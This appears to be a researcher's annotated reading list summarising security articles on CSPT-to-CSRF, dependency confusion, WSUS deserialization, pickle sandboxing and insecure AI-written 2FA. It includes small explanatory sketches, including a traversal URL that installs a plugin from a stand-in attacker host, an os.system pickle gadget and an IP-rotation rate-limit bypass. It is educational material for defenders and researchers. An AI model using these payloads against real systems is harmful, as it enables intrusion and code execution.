Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - 1775

Maxence Schmitt - Doyensec    Reference →Posted 4 Months Ago
  • Client-side path traversal (CSPT) is a vulnerability where a user-controlled value ends up in the path of a request the frontend builds. For instance, an ID taken from the URL is set to ../../ID; when the frontend concatenates it into an API request, the ../../ID changes which endpoint the request is routed to.
  • Cross-site request forgery (CSRF) is a classic vulnerability that has become harder and harder to pull off over time, thanks to A) awareness of it and B) browser protections like SameSite cookies. The authors combine the two issues so that CSRF still works in some cases.
  • CSPT reroutes a legitimate request, which can be used for CSRF-like attacks. Much of the time, there is no control over the HTTP method, headers, or body of the request.
  • Sometimes, data is returned and then acted upon. When using a GET sink for CSPT, the response sometimes contains an ID that is then used in future requests, such as state-changing POST requests. This allows forcing the user to issue requests that shouldn't normally be possible. There's a catch, though: the attacker must control the ID or routing value in the returned JSON. This can be achieved by exploiting file upload/download features to plant that content first; then the state-changing action can occur.
  • They found an instance of this on the Mattermost chat application. An ID for telem_run_id in the URL was used in the routing that was vulnerable to CSPT. The only data being returned in the response that can be used is the action. This provides a minimal CSRF vuln with specific restrictions.
  • The whitepaper describes how important it is to know the limitations. Once you have this, you can explore more effective ways to exploit the issue. In this case, a single parameter is controlled in the POST request. However, arbitrary data can be put onto the path, including parameters. Knowing these restrictions, they noticed that the plugin installation process only required a single URL parameter. So, this led to RCE!
  • On Mattermost, they discovered a GET-to-POST-based sink. They uploaded a file to /api/v4/files to then use the returned data from the GET request in the POST request. Same as the previous issue, this led to RCE via URL parameters.
  • Overall, this is a good bug class to call out. It's somewhat new, which means many applications are likely to be vulnerable to it. It's a first-come-first-served game!
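To make the rerouting concrete, here's a minimal Python sketch of how a traversal sequence in an ID shifts the resolved endpoint. The URLs and endpoint names are hypothetical, not from the write-up:

```python
from urllib.parse import urljoin

# Hypothetical frontend logic: the app fetches /api/v1/items/<id>,
# where <id> comes straight from a value in the page URL.
base = "https://app.example.com/api/v1/items/"

benign = urljoin(base, "1234")
# A traversal ID walks up the path and lands on a different endpoint,
# with full control over the query string:
evil = urljoin(base, "../../plugins/install?url=https://evil.example/x")
# benign -> https://app.example.com/api/v1/items/1234
# evil   -> https://app.example.com/api/plugins/install?url=https://evil.example/x
```

The request is still same-origin and carries the user's cookies, which is what makes it useful as a CSRF primitive.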

Abusing libmagic: Inconsistencies That Lead to Type Confusion - 1774

Hamid Sj
  • The author of this post had read Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal. When they tried it, many of the tricks weren't working. The tricks mainly relied on fooling a parser into thinking something was a different datatype than it really was. Because of this, they decided to read the source code of libmagic and found how it decides whether something is a JSON file or not.
  • If a JSON file has more than 500 levels of nesting, libmagic treats it as plaintext. It turns out that most file-type-detection libraries have this limitation; the cap ranges from 64 to thousands of levels. In the case of libmagic, and many of its wrappers, anything deeper will simply be reported as plain text. Little quirks can go a long way!
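A simplified stand-in for that detection logic, assuming a cap of 500 as in libmagic (the real implementation is C and checks much more than depth):

```python
import json

NESTING_CAP = 500  # libmagic-style limit; actual caps vary from 64 to thousands


def max_depth(value, depth=1):
    """Depth of the deepest container/scalar in a parsed JSON value."""
    if isinstance(value, dict):
        return max((max_depth(v, depth + 1) for v in value.values()), default=depth)
    if isinstance(value, list):
        return max((max_depth(v, depth + 1) for v in value), default=depth)
    return depth


def detect(data: str) -> str:
    try:
        parsed = json.loads(data)
    except ValueError:
        return "text/plain"
    if max_depth(parsed) > NESTING_CAP:
        return "text/plain"  # mimics libmagic giving up on deep nesting
    return "application/json"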

Vibecoding my way to a crit on GitHub - 1773

Furbreeze
  • The author of this post had found a vulnerability in GitHub previously. They decided to conduct a scan for Dependency Confusion issues on GitLab and GitHub. While looking at package.json, they didn't find anything.
  • Their next step was to check Ruby dependencies on GitHub Enterprise, which is an open-source platform. They thought this was a good target because A) GitHub Enterprise isn't well-known to be open source, and B) dependency confusion in Ruby is less well-known. They noticed over 100 packages that were unregistered externally! So, they created a Ruby Gem for all of these that exfiltrated data via DNS to prove impact.
  • After waiting a bit, they had about 2K callbacks within a 24-hour window of submitting the vulnerability. This allowed them to execute code in several locations, including buildkitsandbox, vscode, and several others. After reporting the vulnerability, they were asked to take down the malicious gems to prevent further impact of the issue.
  • The author claims that they had access to the domain, which was used for the build process and dev code workspaces. They were awarded $20K but thought it would be more. To their credit, they stopped executing further payloads and didn't try to pivot at all. Based on this, they believe the payout should have been higher than the minimum payout for a critical. GitHub is known to have a good bug bounty program, so it's hard to say who is right or wrong here.
  • A good write-up with sound guidance on the discovery process! I thoroughly enjoyed the blog post!
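The core discovery step boils down to a set difference between internal dependency names and what's publicly registered. A toy sketch with made-up gem names (a real scan would query the rubygems.org index instead of a hardcoded set):

```python
# Internal dependencies scraped from the target's Gemfile/gemspec files
internal_gems = {"acme-auth", "acme-metrics", "rails"}

# Names that already exist on the public index (stand-in for rubygems.org)
public_gems = {"rails", "rack", "sinatra"}

# Anything referenced internally but unregistered publicly is claimable
# by an attacker, who can publish a gem of that name with a malicious
# install hook -> dependency confusion.
unclaimed = sorted(internal_gems - public_gems)
```

The DNS-exfiltration payload then just proves which hosts resolved and installed the claimed names.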

Claude Code Can Debug Low-level Cryptography - 1772

Filippo Valsorda
  • The author of this post was writing a Go implementation of ML-DSA, a post-quantum signature algorithm standardized by NIST last summer.
  • After 4 days of trying to create the implementation, the code was rejecting some valid signatures. They tried debugging it for several hours but were unable to resolve the issue. So, they asked Claude Code to check it out and left their computer for a bit.
  • The prompt explains what the code does and the issue they were dealing with. They granted it access to run the tests and implement the changes, as well as access to the source code for reading. They topped it off with ultrathink to make it go hard on the problem. To their surprise, an issue popped up! AI excels at well-scoped tasks like this one.
  • The issue was subtle in the math. They had merged HighBits and w1Encode into a single function for using it within Sign. This function was used in Verify(), which had already produced the high bits. So, they were effectively taking the high bits twice. Claude found the issue immediately without using any exploratory tool use!
  • Was this a fluke? They had two bugs prior to this that each took an hour to debug. One was around incorrectly hardcoded constants. The other was an encoding being 32 bits instead of 32 bytes. In both cases, Claude was able to identify the issue through extensive debugging and multiple runs. Still, this was faster than the author of the post!
  • I love seeing use cases of AI and the prompts used. It helps me utilize the tooling better. Thanks for the article!
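The double-rounding bug is easy to reproduce with a toy decomposition. This is not the real ML-DSA Decompose (which works with centered residues mod q), and the rounding parameter is made up; it just shows why rounding already-rounded data changes the answer:

```python
ALPHA = 190_464  # toy stand-in for the 2*gamma2 rounding parameter


def decompose(r, alpha=ALPHA):
    """Split r as r = high * alpha + low, with 0 <= low < alpha."""
    low = r % alpha
    high = (r - low) // alpha
    return high, low


def high_bits(r, alpha=ALPHA):
    return decompose(r, alpha)[0]


w = 1_234_567
once = high_bits(w)              # what Verify() should compare against
twice = high_bits(high_bits(w))  # the bug: taking the high bits twice
```

Because `once != twice`, signatures that round correctly on the signer's side fail the verifier's comparison, exactly the "rejects some valid signatures" symptom.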

Introducing the First VS Code Extension for Solana Developers - 1771

Ackee
  • A Solana extension with real-time analysis of vulnerability classes. The extension performs checks for Anchor-specific issues, which are definitely needed! They have nine detectors. Of these, I find missing signer verification, unsafe math operations (overflows), and improper sysvar account checks to be the most interesting. Some of them, like unused instruction attributes, aren't strictly "security issues", but they're good static analysis checks.
  • There is also test coverage support. So, you can know which lines of code are not being hit by your unit tests/fuzzer. Good-looking extension!

Vulnerabilities in LUKS2 disk encryption for confidential VMs - 1770

Tjaden Hess - Trail of Bits
  • Confidential Virtual Machines (CVMs) are Linux-based systems that run in automated environments, handling secrets in an untrusted setting. They run on an untrusted host machine but are interacted with remotely. These are used in applications like private blockchains or multi-party data collaboration. These systems require that the host OS not be able to read memory or modify the logical operation of the CVM. Additionally, a remote party should be able to confirm that they are running against a genuine CVM program via a remote attestation process.
  • LUKS2 encryption is used for encrypting the hard drive of the CVM. The volume starts with header information, followed by the actual encrypted data. The usual encryption setting is aes-xts-plain64. The setting cipher_null-ecb is an algorithm that simply ignores the key and returns the data unchanged. When the null cipher is used, the key slot can be opened with any passphrase; the passphrase is effectively ignored (in newer versions, the password must be empty in this mode).
  • This attack enables you to substitute an attacker-controlled drive for the legitimate one.
  • The threat model is really confusing to me. It's a malicious host attacking a VM that is modifying the VM. If the device is running an OS in a VM, couldn't you change the VM's memory to perform arbitrary actions anyway? Maybe I'm misunderstanding something.
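Why any passphrase "works" with the null cipher is easy to see in a sketch. This is heavily simplified (real LUKS2 key slots involve KDFs and key digests); the point is just that the identity cipher makes the key material irrelevant:

```python
def cipher_null_ecb(data: bytes, key: bytes) -> bytes:
    # cipher_null ignores the key entirely: "decryption" is the identity
    return data


sector = b"attacker-substituted sector contents"

# Whatever key material each passphrase derives, the output is identical,
# so every passphrase appears to successfully open the volume.
a = cipher_null_ecb(sector, b"key-derived-from-passphrase-A")
b = cipher_null_ecb(sector, b"key-derived-from-passphrase-B")
```

That's what lets an attacker-crafted header with cipher_null slip a substituted, unencrypted drive past the unlock step.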

CVE-2025-59287 — WSUS Remote Code Execution - 1769

hawktrace
  • The Windows Server Update Service (WSUS) is a Microsoft tool that allows IT admins to manage updates for Windows systems.
  • The update process involves a cookie that is encrypted using AES-128-CBC. Once decrypted, the cookie's contents are passed to BinaryFormatter.Deserialize(). This is a known sink that can be used to get RCE.
  • The API endpoint POST /ClientWebService/Client.asmx is the vulnerable endpoint. The cookie is encrypted but I don't understand how they are able to encrypt the data and then have that be decrypted and used for the deserialization attack. The PoC just has hardcoded data so maybe the key is hardcoded in the application. According to this article, this can be used to get RCE with SYSTEM privileges. Pretty dangerous bug!

Vibecoding and the illusion of security - 1768

Kevin Joensen - baldur
  • AI coding is used everywhere. A particular flavor of it, "vibecoding", is letting the AI do the programming from a prompt alone and seeing how it does. The author of this post asked the LLM to create a 2FA login application. Can it write secure code for a 2FA application? They tried Anthropic's Sonnet 4.5.
  • During the first attempt, it works! A wrong 2FA token fails and the correct one succeeds. The UI even looks very similar to a CTF challenge that I wrote recently. It has a terrible flaw, though: you can just brute-force the OTP space, since it's only 6 digits and there are no brute-force protections.
  • After discovering this issue, they asked the AI whether any security features were missing from the 2FA verify step. It then identifies the missing rate limiting. So, unless you tell the LLM to think about security, it won't magically do it for you. This is a really good lesson.
  • They asked the LLM to fix the issue. It added a rate limit of 5 invalid codes with a 15-minute lockout, using the flask-limiter library (1.2K stars, fairly well maintained) by just adding a decorator to the function. Looking at the settings for Limiter, the application limits by IP. Just by rotating the source IP, the rate limit can be bypassed.
  • With this security issue in hand, they asked the LLM: "Is there anything faulty in the rate limitation that allows for a bypass?" Upon being asked, the LLM described the second vulnerability and fixed it. The fix had some weird cases for specific IPs but seemed okay. On a deeper look, the rate limiting was now keyed by IP and username, so the same issue still exists... After being asked for more security issues, it gives you a bunch of non-existent ones.
  • Vibecoding will not lead to secure code. I think my job just got a lot harder. It's a great article from someone who actually tried to write a security-sensitive application with LLMs to show how badly it goes.
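The bypass comes down to the limiter's key function. A minimal sketch of the idea (this is not flask-limiter itself, and time windows are omitted; flask-limiter's default key is the client address, which is what makes rotation work):

```python
from collections import defaultdict

MAX_ATTEMPTS = 5


class OtpRateLimiter:
    """Toy limiter keyed by client IP, like a default get_remote_address key."""

    def __init__(self):
        self.attempts = defaultdict(int)

    def allow(self, client_ip: str) -> bool:
        self.attempts[client_ip] += 1
        return self.attempts[client_ip] <= MAX_ATTEMPTS


limiter = OtpRateLimiter()

# Intended behavior: a single IP is cut off after 5 tries.
blocked = [limiter.allow("1.2.3.4") for _ in range(6)]

# Bypass: rotate the claimed source IP and every attempt is "the first",
# leaving the whole 6-digit OTP space open to brute force.
rotated = [limiter.allow(f"10.0.0.{i}") for i in range(1000)]
```

Keying by IP-plus-username, as in the LLM's second fix, changes nothing: the attacker still controls the IP half of the key.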

We May Have Finally Fixed Python’s 25-Year-Old Vulnerability - 1767

Yehuda Chikvashvili
  • Pickle, a serialization format in Python, is actually a small bytecode format executed by a little interpreter. It can import modules and execute arbitrary code. Because of this, accepting pickle files as input is an automatic RCE vulnerability in your website. pickle.loads() is the sink to look for. Hugging Face had a vulnerability recently that could have been exploited this way.
  • It's crazy that a serialization format can execute arbitrary code. Imagine if JSON could do this... Pickle has been a bad security mistake for years. So, this post is about trying to fix the security of Pickle in Python!
  • Taint analysis is a static-analysis strategy for tracking the flow of untrusted data. In this case, they're trying to bring taint analysis into the runtime domain for Python pickle deserialization. The key insight is that if a dangerous operation happens during deserialization, it can be blocked. This requires two things: a hook into dangerous calls, and context awareness (are we inside a deserialization or not).
  • PEP 578 added Python audit hooks. They're great for auditing Python execution at runtime with custom hooks; things like os.system can be hooked. This part is super easy once we have a well-defined set of "bad sinks". PEP 567 provides context variables for per-context state. One of these could carry the taint marking whether execution is inside Pickle. On its own that doesn't work, because the taint variable could be modified from the runtime itself. So it was added at the CPython level, making it impossible to alter. Another alternative was to inspect the call stack, but that has really bad performance penalties and zero introspection into C code.
  • Using the audit hooks, it's possible to monitor for security-sensitive operations. There is a set of strncmp() checks against module prefixes such as os. and ctypes., among many others. This blacklist approach works but broke a bunch of things. The initial version had easy evasion vectors via global hooks. Many things still had issues, like multiprocessing. Finally, some calls were audited for some attributes and not others, making the coverage incomplete. So, back to the drawing board!
  • Almost all sensitive operations appear during the import mechanism. Distinguishing import-related events from other operations creates a nice boundary. For the actual execution of bytecode, they were then able to use a whitelist of very specific audit events that have no security impact. This solves the security problem, with the limitation that it relies on audit hooks being in place.
  • They do something unique at the end though: they have a Pickle sandbox with these protections and are asking researchers to escape! I really like this idea, as it gives people a chance to test the security of Pickle. Great article!
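The basic mechanism can be sketched with stock PEP 578 / PEP 567 machinery. Note the post explains that a plain context variable like this is modifiable from the runtime and therefore bypassable, which is why the real taint lives at the CPython level; this only illustrates the idea:

```python
import contextvars
import os
import pickle
import sys

IN_PICKLE = contextvars.ContextVar("in_pickle", default=False)


def audit_hook(event, args):
    # Block a known-bad sink, but only while we are deserializing.
    if IN_PICKLE.get() and event == "os.system":
        raise RuntimeError("os.system blocked during unpickling")


sys.addaudithook(audit_hook)


def safe_loads(data):
    token = IN_PICKLE.set(True)  # taint: we are now inside pickle
    try:
        return pickle.loads(data)
    finally:
        IN_PICKLE.reset(token)


class Evil:
    def __reduce__(self):
        return (os.system, ("echo pwned",))  # classic pickle RCE gadget


payload = pickle.dumps(Evil())
# safe_loads(payload) raises RuntimeError instead of running the command;
# benign pickles load normally.
```

Outside of `safe_loads`, the hook stays silent, so normal use of os.system elsewhere in the program is unaffected.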

A questionable design choice in Stacks/Clarity - 1766

100 Proof
  • Clarity has both a tx.origin analogue, tx-sender, and an msg.sender analogue, contract-caller. Many contracts, including SIP-010 tokens, use tx-sender for authentication. This enables phishing: when a user calls into a malicious contract, that contract can abuse the user's permissions to act as them. The article dissects the implications of this design.
  • One interesting note to me was the trick of requiring a 1 uSTX transfer. Since normal contract interactions don't expect such a call, users can set their post-condition to 0 STX transferred; the TX then fails when the transfer is attempted. 1 uSTX is so little that requiring it is fine, but it prevents the attack. Neat!